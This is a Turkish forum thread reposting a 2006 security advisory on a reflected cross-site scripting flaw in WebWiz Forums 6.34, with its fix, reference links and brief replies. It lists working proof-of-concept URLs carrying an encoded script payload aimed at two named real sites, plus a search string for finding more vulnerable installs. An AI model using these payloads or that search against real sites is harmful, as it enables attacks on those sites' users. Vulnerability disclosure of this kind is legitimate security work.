Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Bilişim Güvenliği 
Webwiz Forums <= 6.34 (Search_Form.Asp) XSS (Çapraz Site Betiklemesi) Zayıflığı Webwiz Forums <= 6.34 (Search_Form.Asp) XSS (Çapraz Site Betiklemesi) Zayıflığı
-
--Güvenlik Raporu--
Nedir:WebWiz forums <= 6.34 (search_form.asp) XSS (çapraz site betiklemesi) zayıflığı
---
Tarih: 08/01/06 07:19 PM
---
Kontaklar:{
ICQ: 10072
MSN/Email: [email]nukedx@nukedx.com[/email]
Web: [url]http://www.nukedx.com[/url]
}
---
Hakkında: Bu metod aracılığıyla uzaktan saldıran birisi ilgili forumun kullanıcısının linke tıklamasıyla mevcut tarayıcıya XSS (çapraz site betiklemesi) saldırısında bulunabiliyor.
---
Örnek & Nasıl:[url]http://[site]/[/url][webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
---
Çözüm: Forum sürümünüzü 7.01 veya daha bir üst versiyona yükseltmeniz.
---
Saygılar,
NWPX team adına,
nuker a.k.a nukedxTürkiye'den bir kaç site:
[code]
http://www.cyber-security.org/CW/Forum/search_form.asp?ReturnPage=Search&search=dasd%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
http://www.bebek.com/EskiForum/search_form.asp?ReturnPage=Search&search=dasd%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
[/code]
ve bir çok örneğini googleda
allintext:"Copyright ©2001-2002 Web Wiz Guide" yazarak bulabilirsiniz. -
hoca WebWiz forums 6.34 kullanan çok az site var pek kullanılmıo 7.6 sı varken =)
saolsın emeğine sağlık ...
-
evet ama azýnsanacak bir sayýdada değil en iyi örneði LW ;))
Raporun ingilizce hali ve referansları
http://seclists.org/lists/fulldisclosure/2006/Jan/0304.html
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0299.html
http://www.securityfocus.com/archive/1/421615/30/30/threaded
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla